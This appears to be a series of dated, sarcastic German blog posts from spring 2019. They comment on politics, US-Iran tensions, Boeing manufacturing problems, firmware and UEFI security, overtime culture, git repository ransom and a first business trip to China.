Der eine oder andere wird es schon wissen: Die Regierung und der Rest der Exekutive war mal als Dienstleister des Parlaments gedacht. Das Parlament sagt, was gemacht wird, und die Exekutive macht es. Dass die sich als die Entscheider aufspielen und sich das Entwickeln von Visionen für das Land anmaßen, das ist eine Parallelrealität, die die uns solange einzureden versuchen, bis wir das glauben. Nicht nur geht es prima ohne die weiter, sie sind auch eigentlich überhaupt nicht wichtig. Wenn einer geht, nimmt man halt den nächsten. Wie wenn der Postbote oder der Müllmann wechselt. Dann braucht es vielleicht ein paar Wochen, bis man sich aneinander gewöhnt hat, aber das war es auch schon.
Das ist aber nicht nur schön, weil man gut sieht, dass die gar nicht wichtig sind. Es ist auch schön weil man gut sieht, auf was für dünnem Fundament so eine Regierung gebaut ist, die dann jahrelang Kompetenz und "wir haben das hier alles im Griff" ausstrahlt. Alles Smoke and Mirrors, wie man bei den Amis sagen würde.
[l] Also so langsam muss man wieder anfangen, sich vor Microsoft zu fürchten. Nicht nur haben sie Linux umarmt, auch mit Erzrivalen Sony haben sie einen Deal gemacht. Videospiel-Streaming aus der Azure-Cloud. Nach 20 Jahren Rivalierie mit gegenseitigem Exklusiv-Spiel-Herumärgern zum Schaden der Kunden beider Unternehmen ist das so überraschend, dass Sony es nicht mal ihrer eigenen Playstation-Abteilung gesagt hat, die von den Nachrichten völlig überrascht wurde.

Sun May 19 2019

[l] Die New York Times findet, Russland stecke hinter den 5G-Wavies (die Angst vor Krebs/Mikrowelle-Hirnwäsche durch 5G haben). Als ob man dafür 5G bräuchte!!1! Das machen die doch schon durch die Steckdosen!1!!
Die Times hat es sich ja in dem Narrativ bequem gemacht, dass die Russen an allen schlimmen Dingen Schuld sind. Wie im kalten Krieg damals! Erhöhte Krebsraten? Das waren bestimmt die Kommunisten!!!
Aber es stellt sich natürlich schon die Frage, ob die Russen noch kein Abhörequipment für 5G fertig haben, oder ob das bloß ihre normale Destabilisierungs-Strategie ist, alle alten Dinge als kaputt und alle neuen Dinge als gefährlich darzustellen.

Fri May 17 2019

[l] In den USA hat sich die Polizei gewaltsam Zugang zur Botschaft von Venezuela verschafft. Dem vorausgegangen war, das "Aktivisten" die Botschaft stürmen wollen, um den Botschafter rauszuschmeißen und den Gegen-Botschafter vom US-gestützten Putschisten und selbsterannten El Presidente Guaidó installieren. Daraufhin hatten sich Aktivisten der Gegenseite in der Botschaft verschanzt, um den Botschafter zu beschützen.
Gegen-Botschafter! Wir im Mittelalter bei uns mit dem Gegen-Papst! Kannste dir gar nicht ausdenken.
Aber wartet, eine Punchline kommt noch. Was hat die Polizei dann in der Botschaft gemacht?
Dort überreichten die Beamten den Aktivisten, die sich seit Mitte April im Gebäude befinden, ein Räumungsdokument ohne Unterschrift.
Wait, what!? Trump macht jetzt auch Satire-Spaßpartei oder was?

Thu May 16 2019

[l] Endlich ist raus, wieso die Amis gerade so Iran-Panik schieben: Im Persischen Golf haben sie Spionagefotos von iranischen Raketen aufgenommen. Kleine Raketen, die man auf kleine Motorboote laden kann. Und genau das haben die Iraner wohl damit gemacht.
Die Amis dachten sich erst: Damit greifen die unsere großen Boote an! Und in Übungen ist bisher ziemlich verlässlich rausgekommen, dass man einen schwarm von kleinen Motorbooten nicht komplett abgewehrt kriegt mit so einem großen Pott. Und es reicht, wenn einer durchkommt, und dein großer Pott säuft ab. Das Szenario ist seit Jahren bekannt, aber was macht Trump? Noch einen großen Pott bauen lassen. Der teurer als BER ist, übrigens.
Aber egal. Das ist die erste Furcht. Die zweite Furcht ist, dass der Iran damit die Ölexporte der Saudis beendet. Das wäre das Ende der US-Politik gegen Russland, Venezuela und den Iran, die auf dem künstlichen Tief-Halten der Ölpreise setzt, um den ölexportierenden Feinden den Haushalt zu ruinieren. Funktioniert auch gut bisher, die Strategie. Aber wäre halt am Ende, wenn die Ölexporte der Saudis wegbrechen.
Und die Beweislast ist mal wieder USA-typisch erdrückend!
The Pentagon has not released the photograph. On its own, two American officials said, the photograph was not compelling enough to convince the American public and lawmakers, or foreign allies, of the new Iranian threat.
Wenn das Foto nicht mal ihre eigenen Hawks überzeugen kann, dann kann da nicht viel zu sehen gewesen sein. Nebelbank im Dunkeln bei mondloser bewölkter Nacht.
Oh aber das ist nicht der einzige Beweis! Ist gibt noch andere Beweise, und die wären voll überzeugend. Slam-Dunks sozusagen! Leider können sie uns die nicht zeigen. Wegen, äh, *papierraschel* der Sicherheit und so.
Adding to that concern, the United States recently learned of conversations between the Revolutionary Guards and foreign militias discussing attacks on American troops and diplomats in Iraq. The conversations themselves are nothing new, but the recent discussions were held with unusual frequency and included specifics about strikes on American targets.
Ohooo! Es gab Iraner, die sich darüber unterhalten haben, wie man die Amis ärgern kann? Hold the presses!!
American officials said they have also collected intelligence about Iran targeting commercial shipping, prompting a warning to mariners issued last Friday. That was one of the reasons that led American officials to suspect Iran was behind this week’s sabotage of four tankers off the coast of the United Arab Emirates. The officials said they do not have conclusive forensic analysis that shows Iran was to blame.
Ach komm. Seit wann brauchen die USA Beweise! Erzählt uns einfach einen vom Pferd! Von Brutkästen und Baby-Morden! Das ist eine bewährte Methode!

Wed May 15 2019

[l] Lacher des Tages: Intel will UEFI durch was modernes, ordentliches ersetzen. Was macht das neue modern und ordentlich, fragt ihr? Nun, äh, *papierraschel* es ist, äh, … open source?
Ich erinnere mich ja noch gut daran, als Intel uns allen diese EFI-Scheiß aufgezwungen hat. Niemand wollte das haben. Und was haben sie damals gesagt, wieso man das angeblich braucht? Weil es modern und ordentlich ist, im Vergleich zum alten Legacy-Bios.
War wohl doch nicht so modern und ordentlich.
Wieso sollte ich Intel eigentlich glauben, dass das "ModernFW" jetzt modern und ordentlich ist? Wer einmal lügt und so?
Oh und EFI war ja auch schon nicht open source. Daher haben wir UEFI gekriegt. Das war so halb open source. Googelt mal Tianocore, das ist der open source-Teil davon. Bugs, die ihr darin findet, werden auch in eurem UEFI-Bios sein.
Der Grund, wieso UEFI so einen schlechten Ruf hat und so wenig Vertrauen genießt, ist ja, weil die völlig ohne Not ein Modulkonzept eingeführt haben, über das sich dann Malware einnisten kann. Das hätte man natürlich vorher wissen können. Es wird euch nicht überraschen, dass man das natürlich vorher wusste. Man hat es trotzdem gemacht. Weil das ein Trend war.
Genau wie überhaupt metastasierende Firmware ein Trend ist. Früher hatte man ein Mainboard und eine CPU und auf dem Mainboard war ein BIOS und das war es. Wenn man von der Netzwerkkarte booten wollte, gab es ein Konzept für das Laden eines DHCP-Moduls von der Netzwerkkarte. Wenn man einen SCSI-Controller einbaute, gab es ein Konzept für das Laden eines BIOS-Moduls von dort. Das alte Ranzbios war auch schon so modular wie nötig.
Aber heute? Heute hat man in der CPU zwei Firmwares (einmal Microcode, einmal für die Management Engine, die übrigens auch ein eingebetteter Prozessor ist, auf dem ein Betriebssystem-Kernel und User-Space-Module laufen), dann hat man ein UEFI-Bios mit Modulen, dann hat man im WLAN-Chip eine Firmware, in der Netzwerkkarte, selbst Tastaturen und Mäuse haben Firmwares. Oh und auf dem Mainboard gibt es auch nochmal eine Management-Engine mit eigener Firmware. Und innerhalb dieser Geräte gibt es teilweise noch Unter-Firmwares für interne Teilkomponenten, die die verwalten, ohne dass man das von außen sehen kann.
Es ist wieder alte Flat-Earth-Joke. Firmware all the way down.
Insofern entschuldigt, wenn ich nur heiser lachen kann, wenn Intel jetzt von modern und ordentlich redet. Modern ist bei mir ein verbranntes Wort. Wer modern sagt, meint "schlechter als die letzte Generation". Modern heißt "wir haben sinnlos irgendwelche Trend-Hipster-Kacke eingebaut, die niemand braucht, weil wir dachten, dass man das halt heutzutage so macht".
Und alle kämpfen dann mit einer Update-Strategie für ihre Firmwares. Trust-Probleme werden mit Kryptografie unter den Teppich gekehrt. Früher hat man Kryptografie zwischen Regierungen benutzt, dann zwischen mir und meiner Bank, dann zwischen mir und meinem Drucker, zwischen mir und meinem Monitor, jetzt haben wir innerhalb der CPU Kryptographie zwischen Host-CPU-Teil und Management-Engine. Es ist so dermaßen absurd, nicht zuletzt weil das natürlich eine massive Energieverschwendung ist. Aber was mir noch mehr Sorgen macht: Kryptografie ist ein bewegliches Ziel. Wenn morgen ein populärer Algorithmus bricht, dann stürzt uns einmal das komplette Kartenhaus ein, nicht nur Online-Banking. Alles beruht heutzutage auf Kryptografie. AMD macht ja sogar Krypto zwischen Hypervisor und VMs und hat RAM-Verschlüsselung. Anstatt mal das Design ordentlich zu machen, erklären wir einfach immer alles für unvertrauenswürdig und machen Kryptografie wie zwischen Ländern, die miteinander im Kriegszustand sind.

Tue May 14 2019

[l] Ich bin absolut schockiert davon, was jetzt hier alles für Leute angeheult kommen wegen der Überstunden. Also BEI UNS machen wir auch total viel Überstunden und das ist voll ungerecht!1!!
NA DANN MACHT DIE HALT NICHT, DIE ÜBERSTUNDEN!
Ich komme um 9 und gehe um 5. Nicht mehr, nicht weniger. Wenn ihr das mit euch machen lasst, euch zu unbezahlten Überstunden nötigen zu lassen, dann habe ich überhaupt kein Mitleid. Macht es halt nicht.
"Herr Doktor, wenn ich so mit dem Kopf gegen die Wand haue, tut das immer so weh!"
"Dann mach das halt nicht!"
Duh!
Und erzählt mir nichts davon, in eurem Krankenhaus / in eurer Branche sei das halt so. Dann hättet ihr euch das vielleicht vorher mal angucken sollen?
Meine Güte ey. Nicht DIE beuten euch aus. IHR beutet euch aus. Und rationalisiert euch jetzt hier zurecht, dass das irgendwie magisch doch gar nicht eure Schuld ist. Doch. Ist es.
Und ihr merkt nicht mal, dass das bloß Zurechtrationalisierungen sind, wenn ihr mir erzählt, dass ihr das ja macht, weil ihr sonst nicht befördert werdet. Stellt euch doch mal vor, ihr seid der Boss. Ihr habt zwei Mitarbeiter. Einen, der freiwillig Überstunden macht, und einen, der genau seine Zeit abarbeitet. Wen befördert ihr? Doch nicht dem, dem seine Zeit nichts wert zu sein scheint und der sie euch freiwillig schenkt!? Der ist in zwei Jahren ausgebrannt und dann holt ihr halt den nächsten Jungspund ran, der es noch nicht besser weiß. In so jemanden investiert man doch nichts, wenn der eh bald ausgebrannt ist!
Nein, du investierst in den, der nachhaltig wirtschaftet mit seiner Zeit. Weil du dich bei dem darauf verlassen kannst, dass der dann nicht spontan ausfällt, weil er nicht mehr konnte. Und der ist offensichtlich langfristig interessiert.
Update: Noch ein Punkt. Nehmen wir mal an, du bist der Manager. Du hast ein Projekt mit drei Mitarbeitern. Woher weißt du, wie lange das dauern wird? Du fragst deine Leute und nimmst eine Schätzung. Dann guckst du auf das Feedback und korrigierst nach. Daraus ergibt sich eine Erfahrung, "wie lange sowas braucht". So und was passiert jetzt, wenn die Leute dann Überstunden schieben? Dann fehlt dir das Feedback, dass deine Schätzung zu knapp war. Und die nächste Deadline wird wieder unrealistisch. Damit machst du also nicht nur dich kaputt, du trainierst auch den Manager falsch und machst damit alle zukünftigen Projekte mit kaputt. Das ist aus jedem fucking Blickwinkel falsch, Überstunden zu machen. Projekte mit schlechter Planung muss man kontrolliert gegen die Wand fahren lassen, damit die Planung das nächste Mal besser wird. Das schuldest du dir selbst und auch deinem Arbeitgeber.
Update: Jetzt kommt als Argument rein, ich als privilegierter ITler habe da gut reden, aber in prekären Berufen sehe das halt so aus, dass man die Leute der Reihe nach in den Burnout treibt und dann durch jemand anderen ersetzt. Niemand ist da an Nachhaltigkeit interessiert. Inhaltlich stimme ich dem zu, solche Beispiele kenne ich auch. Aber ein paar Punkte dazu.
Erstens: Ich habe vor ein paar Jahren ein Buch über Foltertechniken der CIA gelesen, und die haben da sehr deutlich den Punkt gemacht, dass Folter dann effektiv ist, wenn das Opfer sie sich selbst zufügt. Daher hat man in den Abu Ghraib-Fotos gesehen, wie die mit ausgestreckten Armen dastanden. Das bist dann du, der die Arm- und Beinschmerzen verantwortet, und das ist der effektivste Aspekt von Folter. Schon aus dem Grunde plädiere ich immer dagegen, bei Dingen mitzumachen, von denen du weißt, dass sie dich später schmerzen werden. Das ist, wieso Burnout-Schäden so lange vorhalten. Das wird dich kaputtmachen.
Zweitens: Du hast die Wahl, ob du Teil des Problems (mitmachen) sein willst, oder Teil der Lösung (nicht mitmachen). Klar, wenn man in einer Notlage ist und das Arbeitsamt einen drangsaliert, wird man notgedrungen auch Dinge mitmachen. Ich mache da niemandem einen Vorwurf. Aber wenn du die Wahl hast, musst du immer darauf achten, Teil der Lösung und nicht des Problems zu sein.
Drittens sind die Branchen mit derartiger Ausbeutungsmentalität genau solche, von denen ich erwarten würde, dass die auch bei der Zeiterfassung massiv bescheißen.

Mon May 13 2019

[l] Was mich ja an den Katholiken immer am meisten fasziniert, ist wie die es schaffen, immer wieder andere zahlen zu lassen.
Aktuelles Beispiel: Katholische Kirche lässt sich von Google Werbe-Einblendungen schenken.
Natürlich mussten sie dafür lügen, dass sich die Balken nur so biegen, aber hey, wir reden von der katholischen Kirche. Seit wann hält die sowas auf.
Konkret hatten sie eine "wohltätige Vereinigung" gegründet, die Google gegenüber so tat, als würden sie in Krankenhäusern Abtreibungen für notleidende Frauen anbieten. Tatsächlich haben die aber natürlich keine Abtreibungen gemacht sondern die Frauen zu hirnwaschen versucht, dass sie doch lieber keine Abtreibung durchführen.
Wenn das irgendeine andere Organisation wäre, wäre ich jetzt echt entsetzt, wie tief man sinken kann.
[l] Erinnert ihr euch noch, als vor ein paar Jahren unter Windows plötzlich die Blue Screens aufhörten? Unter Windows 7 gab es plötzlich und überraschend so gut wie keine mehr. Das lag daran, dass Microsoft bei ihrem Security Push mal geguckt hat, wer eigentlich Blue Screens verursacht, und das waren zu über der Hälfte Grafikkartentreiber. Die werden halt auf Performance entwickelt, nicht auf Zuverlässigkeit. Für Zuverlässigkeit hat doch keiner Zeit!1!!
Microsoft hat sich damals entschieden, dass der Grafikkartentreiber mal in den User Space verschoben werden muss, und nur noch ein winziger Teil darf im Kernel bleiben. Das Stichwort ist User-Mode Display Drivers.
SO SCHLIMM war das, dass Microsoft deren Treiber in den User Mode verschoben hat. Und statt eines Blue Screens gab es dann nur noch ein "die Grafikkarte musste neu gestartet werden" als Toast im Taskbar und der Rechner ranzt nicht mehr ab.
Dem muss man gegenüber halten, dass Microsoft selbst Font-Rendering im Kernel gemacht hat. Das flog ihnen auch alle Nase lang um die Ohren. Das ist länger im Kernel geblieben. Die Grafiktreiber waren dringender.
Warum blogge ich das? Weil Nvidia offenbar nach nur 30 Jahren Kack-Treiber ausliefern das Memo gekriegt hat und jetzt auch mal Security-Bugs fixt.
Jetzt müssen nur noch AMD und Intel mitmachen!
Unter Kernel-Code-Auditoren gab es damals teilweise ernsthaft die Frage, warum wir uns hier eigentlich soviel Mühe machen, wenn die Leute da draußen GPUs und Treiber haben, die alles wieder zum Scheunentor machen. Inhaltlich war diese Frage durchaus gerechtfertigt. Aber so darf man an Security und Qualität generell natürlich nicht rangehen. Man putzt ja auch zuhause das Fenster, obwohl das daneben auch schmutzig ist. Das macht man dann halt danach sauber.

Sat May 11 2019

[l] Wisst ihr noch, wie ich gewarnt hatte, dass die Schwarze Pest mit ihrem Trojanereinsatz Salamitaktik macht? Erst nur für Serienmörder, und jetzt soll der Einsatz auch Einbrecher erlaubt sein — selbst wenn sie nicht einer Bande angehören.
Falls jemand dachte, dass die aus dem Vorfall lernen, als jemand ihre persönlichen Daten abgegriffen und Dritten zugänglich gemacht hat, … dann habt ihr euch geirrt.

Wed May 8 2019

[l] Vor einem Jahr ist ja Trump unilateral aus dem Iran-Atom-Abkommen ausgestiegen, und die EU hat dann Versprechungen in Richtung Iran gemacht, die wir nicht eingehalten haben. Es ist ein Wunder, dass der Iran sich das so lange gefallen lassen hat. Das ist jetzt vorbei. Sie sind zwar nicht völlig ausgestiegen, aber wollen anfangen, einzelne Teile des Abkommens nicht mehr zu erfüllen. Konkret geht es darum, dass im Abkommen stand, wenn sie überschüssiges Uran anreichern, dass sie das dann verkaufen müssen. Das wollen sie jetzt nicht mehr machen.
Darauf haben die Amis natürlich nur gewartet. Das scheint der Plan gewesen zu sein. Den Iran provozieren und vorführen und wenn sie ungehalten werden das als unmittelbar bevorstehenden Angriff auslegen. Lacht nicht! Genau das passiert gerade. Das scheint auch die "dringliche Sache" gewesen zu sein, wegen derer US-Außenminister Pompeo seine Deutschlandreise so spontan abgebrochen hat.

Sat May 4 2019

[l] Anscheinend rennt gerade jemand rum und kidnappt git-Repositories, fordert Lösegeld.
Erstens gilt natürlich auch bei Sourcecode: Wenn du deinen Scheiß in die Cloud hochlädst, ist es nicht mehr dein Scheiß. Mir völlig unbegreiflich, wieso so viele Leute das machen.
Zweitens: git erscheint nicht wie eine kluge Wahl für Kidnapping. Das ist ein verteiltes Versionierungssystem. Jeder, der mal einen Checkout gemacht hat, hat noch den aktuellen Stand und alle Versionen von vorher. Daher ist die Drohung auch nicht "wir löschen unser Backup" sondern "wir veröffentlichen unser Backup". Es handelt sich also nicht um Open Source-Repositories, die hier angegriffen werden.

Thu Apr 25 2019

[l] Die Polizei in Brasilien hat einen Narco-Papagei verhaftet. Sie haben eine Drogenrazzia gemacht und der Papagei war offenbar zum Schmiere-Stehen trainiert worden und brüllte laut Warnungen, als sich die Polizei näherte. :-)

Mon Apr 22 2019

[l] CNA (die hier) berichtet gerade über die Terroranschläge in Sri Lanka, dass die Regierung eine örtliche Gruppe beschuldigt, die bisher aber nur durch Vandalismus von buddhistischen Statuen aufgefallen sind, aber sie sollen Hilfe von einem ausländischen Terrornetzwerk gehabt haben. Wieso würde eine Anti-Buddhismus-Gruppe ausgerechnet Kirchen bombardieren?!
Und weiter: Der Geheimdienst hatte anscheinend vor zwei Wochen eine relativ konkrete Warnung vor Anschlägen gegen Hotels und Kirchen erhalten und nichts gemacht.
Da ist das Terror-Bullshit-Bingo ja schon mit dem ersten Beitrag voll gefüllt!
Ich bin übrigens ziemlich überrascht von CNA. Das ist ein Nachrichtenkanal auf Englisch, und das ist auffallend gut. Ich habe vorher noch nie von denen gehört.
Auch das chinesische Staatsfernsehen ist viel besser als ich erartet hatte. Ich hatte so ein bisschen mit etwas wie RT gerechnet, also lauter rhetorischen Fragen und einziges Thema, wie schlimm es im Westen ist. Aber so ist das überhaupt nicht. CNA ist wie CNN ganz am Anfang mal war, als sie nicht ständig die Sinne mit lauter Eigenwerbung und Herumgeblinke zu betäuben versicht haben, CCTV (chinesisches Staatsfernsehen ist ein bisschen wie BBC, aber mit weniger moralisierende Zeigefinger-Stories. Aber so mit Kinderfernsehen und Unterhaltung und Nachrichten. Also wie BBC, nicht wie BBC World jetzt. Die chinesischen Berichte aus Afrika fallen dadurch auf, dass sie den Afrikanern mit mehr Respekt begegnen als unser Fernsehen. Wenn es das bei uns im Kabelfernsehen gäbe, würde ich das glaube ich gelegentlich gucken. Der Unterschied dazu, wie abstoßend CNN, RT und BBC heutzutage sind (bei CNN ertrage ich eigentlich nur noch Fareed Zakaria, der hat da eine wirklich gute Show, die aber ständig unterbrochen wird), hat mich jedenfalls echt schockiert. Gar nicht mal, dass die Chinesen so großartig waren! Wie viel Abstand die hatten, indem sie einfach nur die schlechtesten Trends nicht mitgemacht haben.
Im CCTV läuft auch Propaganda, so ist das nicht. Der Staatschef besucht ein kleines Dorf, sowas.

Sun Apr 21 2019

[l] Leserbrief zu Microsofts Google-Memo-Moment:
Ich arbeite bei einer anderen top 5 Softwarefirma in den USA und obwohl wir keinen offiziellen finanziellen Incentive haben gegen weisse Männer zu diskriminieren so wie bei MSFT haben wir einen inoffiziellen:
Manager werden u.a. darüber bewertet wie gut sie Mitarbeiter ausbilden.
Das wird daran gemessen wie viele Mitarbeiter sie befördern. Es ist allgemein bekannt, dass es im derzeitigen Stimmungsumfeld einfach ist bestimmte Gruppen zu befördern z.B. Frauen. Deswegen will jeder Manager um jeden Preis Frauen anstellen. In meinem direkten Team wurde kürzlich sogar eine Frau ohne Interview angestellt (sie hatte an einer Umschulung für minorities teilgenommen und dann einen internal transfer gemacht). Ist normalerweise undenkbar ohne technisches Interview an so einen Job zu gelangen.
In All-Hands Meetings (also offiziellen Versammlungen aller Mitarbeiter) wurden weisse, männliche Jobkandidaten von HR öffentlich schon als "Not good candidates" bezeichnet.
Wow. Jemanden ohne Interview einstellen habe ich noch nie gehört. Das ist echt ungewöhnlich.
[l] Geht noch weiter mit den Boeing-Enthüllungen.
Less than a month after the crash of the second 737 Max jet, Boeing called North Charleston employees to an urgent meeting. The company had a problem: Customers were finding random objects in new planes.
Ach komm, Fefe, das ist doch absurd. Herumfliegender Müll in frisch georderten Flugzeugen?! Das kann doch gar nicht sein!1!!
So-called foreign object debris is a common issue in aviation. Employees are supposed to clean the bowels of the aircraft as they work, often with a vacuum, so they don’t accidentally contaminate the planes with shavings, tools, parts or other items.
Ach du Scheiße! Und was sagen die Kunden zu sowas?
In March, the Air Force halted deliveries of the KC-46 tanker, built in Everett, Wash., after finding a wrench, bolts and trash inside new planes.
Na gut, aber es ist ja offensichtlich als Problem erkannt. Wie hat Boeing denn reagiert?
Kommt ihr NIE drauf!
“I’ve found tubes of sealant, nuts, stuff from the build process,” said Rich Mester, a former technician who reviewed planes before delivery. Mr. Mester was fired
Na klar! Den Whistleblower feuern!
Das findet ihr schon schlimm? Na dann guckt mal hier:
While inspecting a plane being prepared for delivery, Mr. Clayton, the technician currently at the plant, recently found chewing gum holding together part of a door’s trim. “It was not a safety issue, but it’s not what you want to present to a customer,” he said.
Erinnert ihr euch noch daran, wie wir uns über DDR-Produkte lustig gemacht haben damals?
Aber gut, Shit happens. Repaiert man dann halt, nicht wahr?
He also reported to management that defective parts had gone missing, raising the prospect that they had been installed in planes. His bosses, he said, told him to finish the paperwork on the missing parts without figuring out where they had gone.
Ja genau! Jetzt ist das Kind schon in den Brunnen gefallen! Kein Grund, da noch meine Karriere hinterherzuwerfen!1!!
Ein Leser schrieb mir übrigens, er arbeite bei einer Firma aus der Airbus-Lieferkette, und da sehe das ähnlich übel aus, speziell beim Parts Management. Ich kann das weder bestätigen noch widerlegen, aber es würde mich wundern, wenn die Markttteilnehmer sich da stark unterscheiden würden. (Danke, Friedrich)

Sat Apr 20 2019

[l] Leserbrief zur Arbeiter-Demografie in China:
Das mit den ältere Menschen rausschmeißen hat übrigens auch mit der Unsitte, „996“ zu machen (9 Uhr bis 9 Uhr im Büro, 6 Tage die Woche) zu tun; was in China in der High-Tech-Branche weit verbreitet ist. Die Mitarbeiter aus den Unis sind so innerhalb weniger Jahre ausgebrannt, und dann kann man die nicht mehr brauchen. Ergebnis ist, dass man in China eigentlich immer auf Frischlinge trifft, die noch nicht eingearbeitet sind. Die Manager dort nehmen Kurse, und was „gut“ für die Firma ist, wird aus den USA kopiert, und dann noch etwas übersteigert umgesetzt. Dass die Firmenkultur in den USA in der Regel Schwachsinn ist, das werden die Chinesen schon noch lernen, die Japaner haben ja auch nach viel Karoshi und mangelnder Qualität gelernt, dass es anders geht; und am Beispiel von Toyota-GM-Joint-Ventures auch gezeigt, dass man das zwar in den USA ausrollen kann, aber die GM-Manager das nie und nimmer verstehen, und nicht in der Lage sind, es zu kopieren. Karoshi wird derzeit auch in China heiß diskutiert (neulich ist ein 29-Jähriger nach 160 Überstunden tot umgefallen), und 996 als Ursache ausgemacht. Ich gehe davon aus, dass das bald Geschichte sein wird.
[l] Leserbrief zu Amazon in China (eigentlich über Amazon in Russland):
ich weiß nicht, was die lokalen Besonderheiten in China sind, es würde mich aber nicht wundern, wenn Amazon dort den gleichen Fehler gemacht hat wie Walmart in Deutschland: lokalen Status-Quo unterschätzen. Ich beobachte allein schon herkunftsbedingt mit Interesse, wie sich Russland entwickelt und finde, dass der Onlinehandel dort in eine interessante Richtung schlägt, was z.B. erklären könnte, warum es Amazon noch nicht nach dorthin verschlagen hat.
Wenn ich es richtig vestehe, sucht Amazon in jedem Land nach einem lokalen Partner, der Amazon das von Ihnen gewünschte und gewissermaßen gewohnte Modell anbieten kann: große Lager, Versandlieferung etc. in Russland wäre der erste Ansprechpartner die staatliche Post, die aber historisch so unzuverlässig ist (wird angeblich zunehmend besser, aber das Kind ist schon längst in den Brunnen gefallen), dass lokale Online-Händler sich von vorne rein mit eigener Lieferinfrastruktur abgesichert haben und dabei stark auf andere Liefermodelle setzten: Abholschalter (mit Person dahinter) und Kurierdienste.
Gerade letztere dürften es Amazon besonders schwer machen: das Konzept erinnert eher an Pizza- oder Apothekenlieferdienste, wobei billige Studentenkräfte nicht mit Autos oder Fahrrädern, sondern mit einer ÖPVN-Monatkarte unterwegs sind. Wenn man also das neueste iPhone haben möchte, bestellt man's online (bzw. ruft beim Laden an) und bekommt das Ding in der Regel innerhalb der nächsten paar Stunden geliefert. Da kann ich mir schon sehr gut vorstellen, dass sich diese Konzepte in Amazons Vorstellung sehr schwer auf "Prime / Prime Same-Day" o.ä. mappen lassen, weil sie de facto mit ihren Premium-Produkten auf einmal als extrem langsam wahrgenommen werden. Da ist der Rückzug vermutlich die einzig sinnvolle Entscheidung.
Faszinierend!

Mon Apr 15 2019

[l] Hey, ihr mit den Pullis im Internet! Ihr, denen die CDU gerade das Internet kaputtgemacht hat! Deren nächste Idee ist, euch das Militär auf den Hals zu setzen.

Sun Apr 14 2019

[l] Ich bin jetzt zwei Wochen in China auf Geschäftsreise, und das Internet hier ist bekanntlich gefiltert. Schon beim WLAN-Anmelde-Bildschirm des Hotels (wo man sich mit Raumnummer + Nachname anmeldet), hat eine rote Warnbox mit einem Haufen Kleingedruckten, dass wegen örtlicher Bestimmungen der Zugriff auf manche Sites ("Google, Youtube, Yahoo and some others") sehr langsam sei oder gar nicht ginge, man da leider nichts machen könne und um Verständnis bittet. Die Daten nach Deutschland werden über die USA geroutet. Die Latenz ist entsprechend bei über 300ms.
Auf meinen eigenen Server komme ich, auf die Tagesschau, die Süddeutsche und den Spiegel komme ich von hier, aber die Welt ist z.B. gesperrt. Die Sites, auf die ich komme, fühlen sich schnarchend langsam an (sowas wie 20 KB/sec). Aber mir fiel auf, dass das nur den Textinhalt betrifft. Bei der SZ z.B. laden die Bilder sehr schnell. Da ich Mail lese, indem ich mich auf dem Server interaktiv einlogge, was bei 300ms Latenz gar keinen Spaß macht, wird jetzt der Blogdurchsatz massiv einbrechen, solange ich hier bin. Macht euch keine Sorgen, das ist nur vorübergehend. :-)
Das ist mein erster China-Aufenthalt, und da ist ja immer besonders spannend, die Vorurteile und Erwartungshaltung mit der Realität zu vergleichen. Die erste Beobachtung: Man braucht ein Visum, und das kann man nur aus dem Land mit dem Wohnsitz beantragen, und man braucht eine Einladung einer örtlichen Firma dafür. Das Visum lässt sich aber relativ ad-hoc beantragen und wird dann auch innerhalb von ein paar Tagen ausgestellt. Bei der Einreise gibt es dann eine Menge Security-Foo, wo u.a. alle 10 Fingerabdrücke eingescannt werden. Die Dichte an Überwachungskameras toppt gefühlt noch London, besonders am Flughafen war die Kameradichte sehr beeindruckend.
Wir hatten ein Shuttle zum Hotel mitgebucht, und das stellte sich dann als eine Art Uber-Service heraus, aber in einem Elektroauto, das praktisch 1:1 ein Tesla-Klon war. Als der Fahrer dann das Parkticket bezahlt hat beim Ausfahren, traf mich fast der Schlag: Die Gegenstelle zeigte einen QR-Code an, der Fahrer scannte das mit seinem Handy, dann klickte er auf "Jetzt Zahlen" und seine App generierte einen Rück-QR-Code mit der Bestätigung, die zeigte er dem Kassierer und fertig war die Bezahlung. So habe ich seit Jahren argumentiert, dass Bezahlen gemacht werden sollte. Diese Idee, dass der Supermarkt da ein "sicheres Terminal" hinstellt, hat aus meiner Sicht noch nie Sinn ergeben. Ich habe genau Null Anlass, diesem Terminal mehr zu trauen, als ich dem Kassierer oder seiner Kasse trauen würde. Nur weil das "sichere Terminal" mir 100€ anzeigt, muss das noch lange nicht stimmen. Ein Gerät, dem ich vertrauen würde, wäre mein Handy. Nun kann man natürlich argumentieren, dass die meisten Handys im Umlauf da draußen nicht mehr geupdatete Kaputt-Androids sind, und das stimmt natürlich. Aus Sicht des Kunden (und um dessen Vertrauen geht es ja hier!) sind die aber immer noch vertrauenswürdiger als ein angeblich sicheres Terminal im Supermarkt. Anyway, genau so wie ich mir das immer gedacht hatte, so machen die das hier einfach. Und siehe da: Es funktioniert und flutscht. Und es gibt mehrere Anbieter für solche Bezahl-Apps. Ist mir ein Rätsel, wieso wir das nicht auch so machen.
Die Geschwindigkeit, mit der die hier Infrastruktur aus dem Boden stampfen, ist auch sehr beeindruckend. Wir fuhren da auf der Autobahn und fragten den Fahrer, ob die neu sei, und er meinte so: nee, die ist schon 10 Jahre alt. In einem Tonfall, wie wir in Deutschland über eine Autobahn aus den 1930er Jahren reden würden. Alles wirkt neu. Ging schon los mit dem Flughafen, wo es ein Schild zum "Maglev" gab (Magnetschwebebahn). Redet Deutschland seit Jahrzehnten drüber. Haben die hier einfach.
Dann sieht man im Straßenbild lauter so stinkende Motorroller, äußerlich Vespa-Klone. Bis einer von denen an einem vorbeifährt und man merkt: Die sind alle Elektro-Roller. Zweitakter sind verboten. Wieso bei uns eigentlich nicht?
Was mich im Moment noch am meisten fasziniert: Wo laden die die auf? Man sieht davon neben dem Supermarkt mal eben 30-40 Stück geparkt stehen, aber da ist dann keine Ladestation. Wieviel Reichweite haben die? Seit wann gibt es die hier? Die sahen jetzt alle eher wie ältere Modelle aus Europa aus. Und wieder frage ich mich: Wieso haben wir eigentlich Zweitakter noch nicht verboten? Wieviel Krebs muss ein Gerät mit den Abgasen erzeugen, bevor wir mal handeln in Deutschland?
Ich sah auch bisher keinerlei herumliegenden Müll oder so. In vielerlei Hinsicht fühlt sich das hier wie eine Scifi-Utopie an. Sehr lustig fand ich auf der Autobahn, dass sie auf der Mittel-Barriere plötzlich unvermittelt Blumenkästen hatten.
